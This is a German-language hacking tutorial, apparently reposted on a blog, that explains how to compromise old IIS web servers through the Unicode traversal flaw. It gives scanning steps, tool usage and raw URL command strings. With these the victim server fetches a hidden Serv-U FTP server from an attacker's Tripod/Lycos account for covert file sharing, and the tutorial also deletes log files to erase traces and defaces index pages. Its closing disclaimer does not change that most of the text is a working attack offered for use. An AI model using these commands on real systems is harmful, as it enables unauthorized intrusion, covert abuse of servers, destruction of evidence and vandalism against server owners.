IIS (Server) Hacken

Habe mal was nettes gefunden und will es euch zeigen!!!Da viele klicks auf Hacking gehen gibt es hier was neues.

IIS (Server) Hacken by Ship (PyrOo)

Ich übernehme keine Verantwortung, fals ihr mit den Informationen etwas zerstört!
Bal bla bla.. ihr kennt den scheiss!

1) Einleitung

In diesem TUT werde ich erklären, wie man IIS Server hacken, defacen, und für die eigenen Zwecke brauchen kann.
Im ersten Teil wird beschrieben, wie dies über Programme geht, im zweiten Teil, wie man solche Server ohne Programme hackt.

2) Scannen

Die Schwachstelle eines IIS Servers liegt darin, dass man bei älteren Versionen über so genannte Unicodes schreiberechte hat. Das heisst, man kann auf alle Daten zugreifen und sie verändern.

Scannen ohne einen Scanner ist fast unmöglich, mann müsste bei jeder IP jeden Unicode ausprobieren, und das kann dauern. Also saugen wir uns erst mal einen Scanner! Ich beforzuge den FX-Scanner.
Dieser Scanner sucht nach IIS Server mit unicodes und nach FTP Server mit anonymous zugang.
Da die ofizielle Seite leider offline gegangen ist, habe ich die Install datei auf einen Tripod account geladen.
Wir saugen uns also schnell den FX-Scanner unter
So, nun installieren wir den scanner.. würde Deutsch empfehlen *g
Wir machen am besten einen Ordner auf den desktop und erstellen eine Verknüpfung des Scanners in den Ordner. So können wir immer schnell auf unsere Sachen zugreiffen.
Das Scannen ist keine sache. Ihr könnt die IP Range angeben mit z.B. 1.2.*.* (das heisst, dass der Scanner jz statt den *en alle zahlen durchgeht!)
Wenn ihr wollt, könnt ihr noch einen Proxy einstellen. Oder FxP Tests machen, aber eigentlich alles überflüssig.
Wenn der Scanner etwas findet, speichert er die daten in eine datei im Verzeichnis des Servers.
Da steht dan die IP, der Unicode, die Laufwerke (können wir später noch brauchen) und ob der Server eine Firewall hat. (haben sie meistens! Teure Firewalls aber iis bugs.. *g Peinlich!)

3) Hacken (mit Tools)

Das mit den Tools ist immer so eine Sache. Es giebt viel zu viele, die nicht wissen, was passiert, wenn sie auf einen Button ihrer Hackertools drücken. Meiner Meinung nach, ist es OK, wenn man mit Tools arbeitet. Aber nur, wenn man auch versteht, was da eigentlich Passiert! Sie sind schneller und bequemer!

Ich kenne nur 2 Tools, die für iishacking geeignet sind! Diese sind Azrael666 und IISDjinn ;]
Ihr bekommt sie auch unter (Namen: Azrael666 und IISDjinn…)
Ich muss noch sagen, dass IISDjinn noch nicht fertig gecodet ist. Ist aber ein echt gutes Programm! (thx an DjinnHunter187)

Mein Tipp: Erst IISDjinn und erst, wenn da irgend was nicht funtzt kommt Azrael666 zum Einsatz

Wir starten nun IISDjinn, dann geht’s so weiter:

- wir geben die Ip an und drückenmal Unicode 1, entweder kommt, dass du keine Rechte hast (oder Seite kann nicht angezeigt werden, usw.), oder du siehst die Festplatte c:
- Wir klicken auf „Log In“, wo wir die Festplatte sehen können
- Nun sehen wir die verschiedenen Befehle.. ich werde sie euch mal kurz erklären:
-
DIR Ihr könnt ein Verzeichnis angeben und auf DIR klicken, dann werdet ihr alle
Daten/Ordner in diesem Verzeichnis sehen (in den Scannresultaten steht ja, welche Verzeichnisse vorhanden sind)

MKDIR Mit diesem Befehl könnt ihr einen neuen Ornder erstellen…

COPY Mit den COPY Befehl könnt ihr sachen auf dem Server herumkopieren..
Diesen Befehl müsst ihr immmer gleich drücken, wenn ihr etwas auf den Server
machen wollt! (So kopiert ihr die cmd.exe ins internet verzeichnis)

REN Wenn ihr z.B. die index datei überschreiben wollt, wäre es nett, zuerst die alte index
absichert! Mit diesem Befehl, kann man also Dateien Kopieren und ihnen einen neuen Namen geben!

READ Mit READ könnt ihr sachen lesen und downlaoden, geht aber nicht mit allen Formaten! EXE zb nicht! (aber da kennen wir doch ne lösung! Kommt dan weiter unten!  )

DEL Ist da, um Daten zu löschen

DELTREE Damit kann man einen ordner löschen! 

VOL Giebt euch Infos zur Festplatte

ECHO mit Diesem Befehl könnt ihr die Index datei umschreiben! ;]

Einfach mal ein bisschen rumspielen!

4) Wichtig

Wer nicht viel in DOS arbeitet, wird nicht verstehen, wiso dies nicht funktioniert:

C:\gemeinsame Dateien\

Der Server merkt nicht, welchen Ordner du öffnen möchtest!
Da du in einem anderen System schreiben musst!

Wenn der Ordner „Hallo“ heisst, geht es ganz normal, da er keine Lehrzeichen beinhaltet.
Daher:
C:\Hallo\

Wenn der Ordner „Hallo du Arsch“ heisst, geht es anders, da zwischen den Wörtern Lehrzeichen stehen.
Das System ist ganz einfach:
Zuerst nimmt man die ersten 6 Buchstaben, der Ornder (hier also: Hallod) nun kommt noch ein ~1 dazu!
(es kann sein, dass es auch ~2 oder ~3 ist, einfach ausprobieren!)
Also:
C:\Hallod~1\

5) Downloaden (mit IISDjinn)

Wenn wir glück haben, können wir über den READ befehl die Datei saugen oder ansehen.
Fals es nicht geht ist dies nicht weiter schlimm.
Ich müsste fileicht noch etwas erklären…
Wenn wir die ip 1.2.3.4 haben, ist das ja ein Server, aber wenn wir in den Browser eingeben, sehen wir ja nicht die Festplatte, sondern eine Seite!
Alle Seiten sind im Ordner Laufwerk/inetpub/wwwroot/ gespeichert!
Das heisst, wenn wir die Datei, die wir saugen wollen in diesen Ordner kopieren, haben wir es schon geschaft!

Beispiel:

Wir möchten die datei „Geschäfte.doc downloaden!

Wir geben also beim COPY Befehl
Oben: c:\ordner\geschäfte.doc und
Unten: c:\inetpub\wwwroot\
an! (für c einfach den Laufwerknamen!)
nun gehen wir wieder in den Browser und geben folgedes ein:

und schon haben wir es geschaft!
Einfach oder? ;]

6) Uppen

Uppen würde ich ohne Programme, ist leichter so! 
Aber ganz einfach wird es nicht!
Ich werde euch hier schnell den sichersen Weg beschreiben.

1) wir richten uns einen Tripod Account ein.
2) Wir uppen die Daten, die wir später auf den gehackten Server laden wollen auf diesen Account
3) Nun müssen wir die Daten nur noch vom Tripod Server auf unseren Server laden, dies geschieht so:

(zb. ich will nun eine index.htm und eine logo.jpg saugen)

(IP= IP des gehackten Server, c+mkdir+c:\temp\etc\etc\etc = erstellt dieses Verzeichnis)

(Befehl giebt uns schreiberechte!)

/scripts/superlol.exe?/c+echo+open+ftp.mitglied.lycos.de+21>>c:\temp\etc\ etc\etc\ftpscr.txt
(IP= IP des gehackten Server, ftp.mitgleid.lycos.de= Tripod ftp Server, 21=ftp Port)

http://IP/scripts/superlol.exe?/c+echo+USERNAME>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehackten Server, USERNAME= euer Tripod Username)

http://IP/scripts/superlol.exe?/c+echo+PASSWORT>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehackten Server, PASSWORT = euer Tripod FTP Passwort)

http://IP/scripts/superlol.exe?/c+echo+BINARY>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehackten Server, BINARY= Format)

http://IP/scripts/superlol.exe?/c+echo+get+index.htm>>c:\temp\etc\etc\etc\ftpscr.t xt
(IP= IP des gehackten Server, index.htm=die Datei, die ich saugen will)

http://IP/scripts/superlol.exe?/c+echo+get+logo.jpg>>c:\temp\etc\etc\etc\ftpscr.tx t
(IP= IP des gehackten Server, logo.jpg = die 2. Datei, die ichs augen will)

http://IP/scripts/superlol.exe?/c+echo+quit>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehackten Server, quit = ende)

(Dieser Befehl startet das Script!)

nun wird euch der Server die Daten runterladen! Ihr könnt sie dan noch herumkopieren! ;]

7) Pubstro

Jetzt wird’s ein wenig komplizierter, aber das hällt uns nicht auf, oder?
Los geht’s…
Zuerst einmal: Hier gehen fast nur Server ohne Firewall! Also sucht die ohne aus den scannresultaten raus!
Wir brauchen:

• Einen Browser (Internet Explorer, usw.)
• Proxy (zb jap)  ist aber nicht unbedingt nötig!
• Ein FTP programm (zb FlashFxP [auch auf
• Wieder unseren Tripod Account
• Serv-u (auch auf )

1) erst insallieren wir Serv-U und konfigurieren den Port und die Login Daten
2) Wir öffnen Serv-U.ini und schreiben „INVISIBLE=TRUE“ dazu (dass uns der Admin nicht so schnell entdeckt.. )
3) Alles sollte dann in etwa so aussehen:
HomeDir=c:\
AlwaysAllowLogin=YES
Access1=h:\,RWAMCDLEP
Access2=g:\,RWAMCDLEP
Access3=f:\,RWAMCDLEP
Access4=e:\,RWAMCDLEP
Access5=d:\,RWAMCDLEP
Access6=c:\,RWAMCDLEP
Access7=j:\,RWAMCDLEP

Ihr solltet noch einen Zweiten User Account einrichten.
Also einen Root (mit schreiberechten) und einen Remote-user (ohne schreibrechte)
Würde dan ungefär so aussehen:

Access1=c:\,RLP
Access2=d:\,RLP (usw.)

4) Nun laden wir die Serv-U.exe und die konfigurierte serv-U.ini in das Hauptverzeichnis unseres Tripodaccounts
5) Nun erstellen wir auf den Server ein Verzeichnis, wo wir unser kleines serv-U platzieren wollen.. dieses Verzeichnis sollte möglichst unauffällig sein, damit der Admin nix merkt! (also bz. C:\temp\etc\etc\etc) der code sieht dan so aus:

(IP = Server IP)

Wenn das Verzeichnis erstellt wurde, sollte eine CGI-Fehlermeldung kommen!

6) Wir können nun noch nachschauen, ob das Verzeichnis auch wirklich existiert.
(ihr müsst den Pfad natürlich an eurem Verzeichnis anpassen *g)

wenn nun „ .. “ und irgendwas steht, wurde das Verzeichnis erstellt und wir waren erfolgreich.

7) nun müssen wir die cmd noch kopieren, damit wir den echo befehl nützen können!
Das sieht dann so aus:

Wir sind nun fast am Ziel. Nun erstellen wir eine .txt Datei, welche wir als FTP Script nutzen, damit sich der Server per FTP auf unserem Tripod Account einwählt und sich das Serv-U.exe/.ini downloadet (wie bei Download schon )

/scripts/superlol.exe?/c+echo+open+ftp.mitglied.lycos.de+21>>c:\temp\etc\ etc\etc\ftpscr.txt
(IP= IP des gehacken Server, ftp.mitgleid.lycos.de= Tripod ftp Server, 21=ftp Port)

http://IP/scripts/superlol.exe?/c+echo+USERNAME>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehacken Server, USERNAME= euer Tripod Username)

http://IP/scripts/superlol.exe?/c+echo+PASSWORT>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehacken Server, PASSWORT = euer Tripod FTP Passwort)

http://IP/scripts/superlol.exe?/c+echo+BINARY>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehacken Server, BINARY= Format)

http://IP/scripts/superlol.exe?/c+echo+get+serv-u.exe>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehacken Server, serv-u.exe=die Datei, die ich saugen will)

http://IP/scripts/superlol.exe?/c+echo+get+serv-u.ini>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehacken Server, serv-u.ini = die 2. Datei, die ich saugen will)

http://IP/scripts/superlol.exe?/c+echo+quit>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehacken Server, quit = ende)

9) Noch ein kleiner Test, wir geben nun mal
ein.
Wenn etwas wie:

open ##IP-VOM-FTP-SERVER##
##USERNAME##
##PASSWORD##

BINARY
get serv-u.exe
get serv-u.ini
quit

erscheint, ist alles OK! :]

10) Nun führen wir unser Script aus, und zwar mit dieser Zeile:

Der Server connectet nun zu Tripod und saugt sich serv-U ;P

11) Unsere Daten liegen jz im InetPub Verzeichnis des Servers, da wir sie aber in unser Verzeichniss verschiben wollen, geben wir folgendes ein:
http://IP/scripts/superlol.exe?/c+move+serv-u*.*+“c:\temp\etc\etc\etc

12) Damit auch wirklich niemand merkt, dass wir hier waren, löschen wir die Script datei, mit:

13) Nun führen wir die Serv-U auf den Server aus, auch hierzu gibt es wieder einmal einen schönen Befehl:

14) So, nun warten wir ein paar Sekunden und loggen uns dan per FTP Programm (zb. FlashFxP) in den Server ein (nathürlich mit unseren vorher konfigurierten Daten ;] )
15) Nun sind wir im Root Verzeichnis des Severs und haben volle Schreibrechte … als nächstes suchen wir uns ein Unterverzeichniss oder erstellen eins, welches wir als das Verzeichniss benutzen, in das wir später uppen wollen!
16) Wir müssen nun das neue Verzeichnis auch in der serv-u.ini vermerken, also verändern und über die alte schreiben!!

Der Account mit den Schreibrechten müsste dan etwa so aussehen:

HomeDir=d:\Melinda\WORK\sample\LESSON\new\FUCK
AlwaysAllowLogin=YES
Access1=h:\,RWAMCDLEP
Access2=g:\,RWAMCDLEP
Access3=f:\,RWAMCDLEP
Access4=e:\,RWAMCDLEP
Access5=d:\,RWAMCDLEP
Access6=c:\,RWAMCDLEP
Access7=j:\,RWAMCDLEP
RelPaths=YES

und der Account zum Leechen so:

HomeDir=d:\Melinda\WORK\sample\LESSON\new\FUCK

RelPaths=YES
Access1=d:\Melinda\WORK\sample\LESSON\new\FUCK,RLP

17) Wir reconnecten, und tata.. wir sind in unserem Verzeichnis! (und sehen es als root-Verzeichnis) nen können wir uppen was das zeug hällt! *g oder die scheiss DSL Leitung
1 Nun nur noch die Logfiles killen.. und wir waren nie da! :]

Logfiles killen

Jedes mal, wenn ihr zu dem Server connectet, wird eure IP gespeichert! Blöde was? Vorallem wenn ihr ohne proxy hackt (wie ich leider manchmal *g)
Aber Windoof hat wie immer ne lösung
Die Logfiles befinden sich im ordner: c:\winnt\system32\logfiles\ (statt c einfach die Platte)
Wie ihr löschen könnt wisst ihr ja schon! ;]

9) Defacen

Decacen heisst soviel, wie die index.htm Datei des Servers umzuschreiben!
Dies geht über den echo Befehl (unten beschrieben) oder über das Download Pronzip!
Versucht euch selbst darin! Wenn die datei index.htm/.html oder default.htm/.html heisst, geht der Server automatisch darauf, wenn ihr die IP in den Browser eintippt!

10) Code sammlung

Wie versprochen hier noch die codes, um ohne Programme zu hacken!
Wer ein bisschen coden kann, kann sich ja seine Programme selber schreiben!

DIR =
(statt c:\ einfach das Verzeichnis)

MKDIR =
(statt testordner den neuen Ordner & Pfad)

COPY =
(c:\winnt\system… = diese Datei will ich kopieren, c:\inetpub… = in den inetpub\ Ordner mit dem Namen root.exe!)

REN =
(c:\inetpub\wwwroot\index.htm in backup.htm umbenennen)

READ =
(lese die Datei c.\winnt…  hier die Logfiles ;] )

DEL =
(lösche alle Daten mit .htm Endung)

VOL =
(gibt Infos zu der Platte c:

ECHO = http://IP/scripts/root.exe?/c+echo+fuck%20tha%20world!%20by,%20Ship%20>>c:\i netpub\wwwroot\index.htm
(schreibt den text: „fuck tha world! By Ship “ in die index.htm datei!

11) Ende

So, dass wars dan wieder mal von meiner Seite her! ;]
Ich werde bald wieder mal ein Tut schreiben, hoffe, es wird wieder genau so gross, wie dieses hier!

Ihr könnt den Text kopieren, aber bitte nicht verändern! (auch die Schreibfehler gehöhren zu mir *lol)

*** Dieses Tutorial dienst lediglich dazu, die Denkweise von Hackern zu verstehen!
Missbrauch ist strafbar! Ich hafte nicht für Schäden!

Upper:Sylber

September 9, 2007 - Verfasst von grexx | Hacking | | 1 Kommentar